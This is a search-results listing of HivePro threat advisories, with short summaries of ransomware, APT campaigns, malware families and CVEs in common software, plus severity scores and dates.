Lucene search
K
HiveproMost viewed

1589 matches found

hivepro
hivepro
added 2023/04/19 7:35 a.m.30 views

FIN7 & Wizard Spider team up to disseminate Domino malware

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary FIN7 threat actors and Wizard Spider collaborate to distribute Domino malware family in recent attacks. To receive real-time threat advisories, please follow HiveForce Labs on LinkedIn...

6.7AI score
Exploits0
hivepro
hivepro
added 2023/04/05 10:9 a.m.30 views

Winter Vivern APT targets EU with Zimbra flaw

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Winter Vivern abuses CVE-2022-27926 to attack public Zimbra webmail portals of government entities. To receive real-time threat advisories, please follow HiveForce Labs on LinkedIn...

4.3CVSS6.4AI score0.17252EPSS
Exploits0
hivepro
hivepro
added 2023/01/17 11:50 a.m.30 views

Rhadamanthys: A New Evasive Information Stealer

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Rhadamanthys Evasive Infostealer is spread through phishing emails and prevalent Google ads that lead to fake download pages for popular workforce software...

1.8AI score
Exploits0
hivepro
hivepro
added 2023/01/05 1:58 p.m.30 views

Synology addresses the RCE vulnerability that affects VPN Plus servers

Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary Synology has addressed a flaw in VPN Plus Server that has the potential to take control affected systems. The vulnerability, identified as CVE-2022-43931, is an out-of-bounds write fault in Synolo...

5.8AI score0.16841EPSS
Exploits0
hivepro
hivepro
added 2022/10/31 10:45 a.m.30 views

LV Ransomware Exploited ProxyShell to target Jordan

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary LV ransomware as a service has been active since late 2020 The most recent infiltration entailed the compromise of the corporate environment of a Jordan based entity, leveraging the double extortion...

1.6AI score
Exploits0
hivepro
hivepro
added 2022/08/24 8:4 a.m.30 views

Multiple industries targeted by uptick of BianLian ransomware

Threat Level Attack Report For a detailed advisory, download the pdf file here Summary Attackers are gravitating to deliver BianLian, a new ransomware strain written in Go that was spotted mid-way through July 2022. Numerous well-known enterprises have been targeted, including those in...

3.1AI score
Exploits0
hivepro
hivepro
added 2021/08/03 1:5 p.m.30 views

Major Hospitals affected by PwnedPiper Vulnerabilities

THREAT LEVEL: White. For a detailed advisory, download the pdf file here. Multiple Zero-day vulnerabilities PwnedPiper have been found affecting the HMI-3 Control Panel of Swisslog Healthcare’s TransLogic Pneumatic Tube Systems PTS. PTS is a specialized system that uses compressor to transport...

7.5CVSS9.8AI score0.03396EPSS
Exploits0
hivepro
hivepro
added 2024/03/21 5:46 a.m.29 views

Critical Flaw In WordPress Plugins Poses Risk Of Site Takeover

Summary: A critical security vulnerability, identified as CVE-2024-2172 in WordPress, urges users utilizing miniOranges Malware Scanner and Web Application Firewall plugins to uninstall these plugins from their websites. This vulnerability enables unauthorized attackers to gain administrative...

7.5CVSS7.2AI score0.01712EPSS
Exploits1
hivepro
hivepro
added 2024/02/27 7:17 a.m.29 views

Apple Shortcuts’ Secret Threat to Your Data

Summary: A security vulnerability, identified as CVE-2024-23204, has been found in Apples Shortcuts application, allowing unauthorized access to sensitive information on devices bypassing TCC. The capability for users to export and share these shortcuts heightens the susceptibility to potential...

5CVSS6.8AI score0.01789EPSS
Exploits0
hivepro
hivepro
added 2024/01/24 9:39 a.m.29 views

NS-STEALER Utilizes Discord Bots for Covert Exfiltration of Sensitive Data

Summary: A recently discovered Java-based information stealer, named NS-STEALER, employs a Discord bot channel as an EventListener to exfiltrate sensitive data from compromised hosts. This malware is distributed through ZIP archives that disguise themselves as cracked software. Threat Level - Amb...

6.8AI score
Exploits0
hivepro
hivepro
added 2023/12/14 8:27 a.m.29 views

Apple’s Timely Response to Actively Exploited Zero-Days

Summary: Apple has released crucial software updates to address two actively exploited security vulnerabilities identified as CVE-2023-42916 and CVE-2023-42917. These vulnerabilities affect the WebKit browser engine on Apple devices such as iPhone, iPad, and Mac, potentially exposing sensitive...

6.8CVSS7AI score0.17963EPSS
Exploits0
hivepro
hivepro
added 2023/10/18 3:18 a.m.29 views

Unpatched Zero-Day Vulnerability Actively Exploited in Cisco IOS XE

Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary The critical, unpatched security vulnerability identified as CVE-2023-20198 affects Cisco IOS XE software. Cisco IOS XE is a network operating system used in Cisco network devices. The identified...

7.5CVSS7.3AI score0.99571EPSS
Exploits26
hivepro
hivepro
added 2023/09/25 6:37 a.m.29 views

Sandman APT Strikes the Telecom Sector with the LuaDream Backdoor

Threat Level Actor Report For a detailed threat advisory, download the pdf file here Summary Sandman APT, an espionage group of unknown origins that surfaced mysteriously in August, is orchestrating a sophisticated campaign aimed squarely at telecommunications providers spanning the Middle East,...

6.9AI score
Exploits0
hivepro
hivepro
added 2023/09/19 6:36 a.m.29 views

APT 33 Uses Password Spray Campaigns to Infiltrate Organizations

Threat Level Actor Report For a detailed threat advisory, download the pdf file here Summary APT 33 aka Peach Sandstorm is an Iranian nation-state threat actor that was first identified in 2013. This group is notorious for conducting cyber espionage campaigns and has been associated with various...

6.9AI score
Exploits0
hivepro
hivepro
added 2023/09/08 1:29 p.m.29 views

Agent Tesla’s New Variant Spreads Through Crafted Excel Files

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary A phishing campaign has surfaced, disseminating a new iteration of the Agent Tesla malware through a meticulously crafted Microsoft Excel document. This document exploits a longstanding memory corruption...

7AI score
Exploits0
hivepro
hivepro
added 2023/08/18 4:50 p.m.29 views

AdLoad Malware Persists on Mac Systems with New Proxy Payload

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary AdLoad malware persists on Mac systems with a new proxy application payload, converting infected devices into a proxy botnet. This scheme, involving thousands of IP addresses, points to a monetization...

6.9AI score
Exploits0
hivepro
hivepro
added 2023/05/30 11:16 a.m.29 views

A New RAT Named GobRAT Targeting Linux Routers in Japan

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary GobRAT, a new RAT, is infecting Linux routers in Japan through vulnerable web interfaces, granting attackers remote control and the ability to execute commands. To receive real-time threat advisories,...

7.2AI score
Exploits0
hivepro
hivepro
added 2023/03/30 7:7 a.m.29 views

Donot APT Group Targets Government and Military Orgs in South Asia

Threat Level Actor Report For a detailed threat advisory, download the pdf file here Summary The Donot group, also known as APT-Q-38, is a state-sponsored threat actor believed to operate out of a South Asian country. They primarily engage in network espionage activities targeting government...

6.7AI score
Exploits0
hivepro
hivepro
added 2023/03/22 9:33 a.m.29 views

Bad Magic APT employs new CommonMagic Framework and PowerMagic Backdoor

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary New Bad magic APT was discovered using a new backdoor called PowerMagic and a malicious framework called CommonMagic to target organizations in the administrative, agriculture, and transportation sectors...

6.7AI score
Exploits0
hivepro
hivepro
added 2022/09/09 11:43 a.m.29 views

Lazarus deploys new attack tool, MagicRAT to target organizations worldwide

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Lazarus, a North Korean threat actor, compromises vulnerable VMware Horizon servers and deploys MagicRAT, a new remote access tool developed by the attackers. MagicRAT creates scheduled tasks on...

2.7AI score
Exploits0
hivepro
hivepro
added 2022/03/22 7:19 a.m.29 views

Berkeley Internet Name Domain (BIND) affected by multiple vulnerabilities

THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here The Internet Systems Consortium ISC has published security upgrades to address several vulnerabilities in the widely used Berkeley Internet Name Domain BIND server software. An attacker could take advantage of some of these...

0.5AI score0.0325EPSS
Exploits0
hivepro
hivepro
added 2022/03/02 7:35 a.m.29 views

Multiple government entities targeted by China-linked Daxin malware

THREAT LEVEL: Red. For a detailed advisory, download the pdf file here A technologically advanced and previously undocumented malware Daxin was used as the advanced persistent threat APT weapon by China-linked actor against government critical infrastructures across the globe. This malware can re...

0.8AI score
Exploits0
hivepro
hivepro
added 2021/12/25 2:52 a.m.29 views

Old Gatekeeper bypass vulnerability in macOS exploited

THREAT LEVEL: Amber For a detailed advisory, download the pdf file here A gatekeeper bypass vulnerability exists in macOS Big Sur and has been assigned CVE-2021-30853. An attacker can exploit this issue by using a specially-crafted script-based application downloaded from the Internet. This allow...

4.3CVSS0.3AI score0.06998EPSS
Exploits1
hivepro
hivepro
added 2021/09/20 5:48 a.m.29 views

ManageEngine ADSelfService Plus has been abused in the wild due to a zero-day vulnerability

THREAT LEVEL: Red. For a detailed advisory, download the pdf file here. An APT actor is attempting to exploit a zero-day vulnerability in ManageEngine ADSelfService Plus, a self-service password management and single sign-on solution that poses a high risk to critical infrastructure companies,...

1AI score
Exploits0
hivepro
hivepro
added 2024/05/10 3:20 p.m.28 views

Google Chrome Fixes Zero-Day CVE-2024-4671 Exploited in the Wild

...

7.3AI score0.08348EPSS
Exploits0
hivepro
hivepro
added 2024/03/12 6:39 a.m.28 views

Cisco Secure Client Flaw Enables Attackers To Steal VPN Sessions

Summary: A high severity vulnerability tracked as CVE-2024-20337 have been addressed by Cisco affecting its Secure Client software that could allow a threat actor to start a VPN session with the targeted user. Threat Level - Red | Vulnerability Report For a detailed threat advisory, download the...

5.8CVSS6.9AI score0.29906EPSS
Exploits0
hivepro
hivepro
added 2024/02/21 2:17 p.m.28 views

Admins Urged to Uninstall VMware EAP Amid Critical Flaws

Summary: VMware has issued a warning to administrators regarding two unaddressed security vulnerabilities necessitating the removal of an outdated authentication plugin. Identified as CVE-2024-22245 and CVE-2024-22250, these vulnerabilities enable session hijacking and authentication relay attack...

6.8CVSS7.7AI score0.01262EPSS
Exploits0
hivepro
hivepro
added 2024/01/23 7:42 a.m.28 views

Attacks, Vulnerabilities and Actors 15 January to 21 January 2024

For a detailed threat digest, download the pdf file here Summary HiveForce Labs has recently made several significant discoveries related to cybersecurity threats. Over the past week, we identified a total of six executed attacks, two instances of adversary activity, and eight exploited...

6.8CVSS7.8AI score0.03769EPSS
Exploits1
hivepro
hivepro
added 2023/11/30 7:10 a.m.28 views

ParaSiteSnatcher A Silent Threat to Latin America

Summary: Multiple vulnerabilities have been discovered in Google Chrome, including a zero-day vulnerability CVE-2023-6345 actively exploited for remote code execution. Users are advised to update Chrome to version 119.0.6045.199/.200 Windows or 119.0.6045.199 Mac and Linux promptly to safeguard...

6.8CVSS8AI score0.1963EPSS
Exploits0
hivepro
hivepro
added 2023/11/22 8:50 a.m.28 views

The Rise of NetSupport RAT Recent Infections and Sector Impact

Summary: Threat actors exploit NetSupport Manager into a Remote Access Trojan RAT, leading to a recent surge in infections across multiple sectors. The evolving attack chain involves deceptive website downloads, JavaScript payloads, and PowerShell commands, emphasizing the need for vigilant...

7.3AI score
Exploits0
hivepro
hivepro
added 2023/11/21 6:12 a.m.28 views

Attacks, Vulnerabilities and Actors 13 November to 19 November 2023

For a detailed threat digest, download the pdf file here Summary HiveForce Labs recently made several significant discoveries in the realm of cybersecurity threats. In the past week alone, a total of nine attacks were executed, twelve vulnerabilities were uncovered, and four active adversaries we...

7.4AI score
Exploits0
hivepro
hivepro
added 2023/10/19 6:23 a.m.28 views

Multiple State-Sponsored Groups Exploit WinRAR Vulnerability in Phishing Attacks

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary A series of phishing attacks linked to a Russian state-sponsored group, leveraging a WinRAR vulnerability to steal data, including browser credentials via PowerShell commands and exfiltrating it through ...

7.4AI score
Exploits0
hivepro
hivepro
added 2023/10/14 8:40 a.m.28 views

Microsoft’s October 2023 Patch Tuesday Addresses Three Zero-day Vulnerabilities

Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary In the October Patch Tuesday release, Microsoft addressed 103 flaws, including three actively exploited zero-day vulnerabilities. These patches cover critical and important vulnerabilities, a...

6.8AI score
Exploits0
hivepro
hivepro
added 2023/10/14 8:18 a.m.28 views

Unveiling Lu0Bot Malware A Node.js-Based Threat

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Lu0Bot Malware, a Node.js-based threat, surfaced in February 2021 as a secondary payload in GCleaner attacks. This malware acts as a bot, responding to C2 server commands and transmitting encrypted syste...

6.9AI score
Exploits0
hivepro
hivepro
added 2023/10/14 8:13 a.m.28 views

Deciphering Mirai’s Next Chapter: the Strategies of the Latest Players

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary The realm of cybersecurity witnessed the rise of formidable botnet variants stemming from the notorious Mirai source code. Prominent among them are hailBot, kiraiBot, and catDDoS, showcasing heightened...

6.9AI score
Exploits0
hivepro
hivepro
added 2023/09/21 6:5 a.m.28 views

Trend Micro Addresses Zero-Day Flaws Exploited in the Wild

Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary A critical zero-day vulnerability, tracked as CVE-2023-41179, has been identified in the third-party AV uninstaller module contained in Trend Micro Apex One, Worry-Free Business Security, and...

8.1AI score0.04739EPSS
Exploits0
hivepro
hivepro
added 2023/08/29 6:3 a.m.28 views

Chinese Hacking Group ‘Flax Typhoon’ Targeting Taiwan Organizations

Threat Level Actor Report For a detailed threat advisory, download the pdf file here Summary Flax Typhoon, a Chinese nation-state actor, employs sophisticated tactics to target organizations in Taiwan for espionage, utilizing living-off-the-land techniques and legitimate tools to maintain long-te...

6.8AI score
Exploits0
hivepro
hivepro
added 2023/05/25 12:58 p.m.28 views

Pikabot A Stealthy Backdoor with Ingenious Evasion Tactics

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary Pikabot, a sophisticated backdoor evades analysis with anti-analysis measures like the "sleep" function, uses NtContinue API, employs language-based execution cessation, and shows connections to Qakbot...

7AI score
Exploits0
hivepro
hivepro
added 2023/03/14 1:8 p.m.28 views

IceFire Ransomware Strikes Linux-Powered Enterprise Networks

Threat Level Attack Report Follow Hive Pro for a detailed threat advisory, download the pdf file here from HiveForce Labs. Summary A New Linux variant of IceFire ransomware is disseminated by exploiting the deserialization flaw in IBM Aspera Faspex, targeting networks of media/entertainment firms...

2.5AI score
Exploits0
hivepro
hivepro
added 2023/01/27 11:13 a.m.28 views

CRYPTBOT Information-Stealing Malware Targeting Your Browser and Crypto-Wallet

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary CRYPTBOT is malware that steals personal information by gathering browser credentials, cookies, cryptocurrency wallets, and system information. It then compresses the collected data into a zip file and...

1.4AI score
Exploits0
hivepro
hivepro
added 2023/01/19 1:42 p.m.28 views

APT15 enhanced its arsenal with an updated variant of the Turian backdoor

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary APT15 has modified its toolkit to include new variants of the Turian backdoor, as well as new command and control infrastructure. The malware contains VMProtect, which obfuscates all API calls within the...

2.4AI score
Exploits0
hivepro
hivepro
added 2022/09/02 6:34 a.m.28 views

APT40 deployed ScanBox malware to target the Australian government

Threat Level Actor Report For a detailed threat advisory, download the pdf file here Summary APT 40 is a Chinese cyber espionage group, using phishing campaigns to target Australian government institutions and wind turbine operators in the South China Sea by directing selected individuals to a...

2.2AI score
Exploits0
hivepro
hivepro
added 2022/02/17 8:28 a.m.28 views

BlackCat Ransomware group attacks on the rise

THREAT LEVEL: Red. For a detailed advisory, download the pdf file here The Blackcat Ransomware gang also known as ALPHV has targeted around 25 organizations belonging to multiple sectors globally since November 2021. The group has claimed responsibility for the recent cyber attack on Swissport...

6.8AI score
Exploits0
hivepro
hivepro
added 2022/01/06 5:31 a.m.28 views

High severity vulnerability in VMware Workstation, Fusion, and ESXi

THREAT LEVEL: Amber. For a detailed advisory, download the pdf file here. A heap buffer overflow vulnerability has been discovered in multiple products of VMware. This bug has been tracked as CVE-2021-22045, if exploited would result in the execution of arbitrary code by the attacker. Heap...

6.9CVSS1.5AI score0.04681EPSS
Exploits0
hivepro
hivepro
added 2024/03/29 8:32 a.m.27 views

UNC5174 Functions as an Initial Access Broker, Exploiting Vulnerabilities

Summary: UNC5174, a threat actor believed to be associated with China, has been identified exploiting various vulnerabilities and deploying custom tools such as SNOWLIGHT, GOHEAVY, and GOREVERSE for post-exploitation activities. These tools enable UNC5174 to carry out sophisticated cyber...

7.3AI score
Exploits0
hivepro
hivepro
added 2024/03/29 8:29 a.m.27 views

Sysrv Harnessing Google Subdomains to Circulate XMRig

Summary: Sysrv, an advanced botnet, employs a Golang worm to infiltrate devices and distribute XMRig cryptocurrency miners, leveraging network vulnerabilities and undergoing constant evolution through operator refinement. Threat Level - Red | Attack Report For a detailed threat advisory, download...

7.4AI score
Exploits0
hivepro
hivepro
added 2024/02/08 5:54 a.m.27 views

FritzFrog Expanding Its Lethal Reach with Frog4Shell

Summary: The recent activities surrounding the FritzFrog Golang-based botnet reveal in its iterations, the employment of an exploit called Frog4Shell, capitalizing on the Log4Shell vulnerability. Threat Level - Red | Attack Report For a detailed threat advisory, download the pdf file here To...

7.2AI score
Exploits0
hivepro
hivepro
added 2023/11/01 10:43 a.m.27 views

Hackers Utilize MSIX App Packages to Disseminate GHOSTPULSE Malware

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary A new cyber attack campaign has emerged, involving the use of fake MSIX Windows app packages masquerading as legitimate applications. These deceptive MSIX packages are employed to distribute a new malwar...

7.2AI score
Exploits0
hivepro
hivepro
added 2023/09/28 6:42 a.m.27 views

TAG-74’s Multi-Year Campaign Targets South Korean Organizations

Threat Level Actor Report For a detailed threat advisory, download the pdf file here Summary TAG-74 is a state-sponsored cyber-espionage group that has been attributed to Chinese military intelligence. This threat actor has been involved in a multi-year campaign primarily targeting organizations ...

6.8AI score
Exploits0
hivepro
hivepro
added 2023/09/22 6:4 a.m.27 views

Deceptive WinRAR PoC Released on GitHub Drops VenomRAT

Threat Level Attack Report For a detailed threat advisory, download the pdf file here Summary A hacker is disseminating a counterfeit proof-of-concept PoC exploit for a WinRAR vulnerability that was recently patched on GitHub, with the intention of infecting those who download it with the VenomRA...

6.9AI score
Exploits0
Total number of security vulnerabilities1589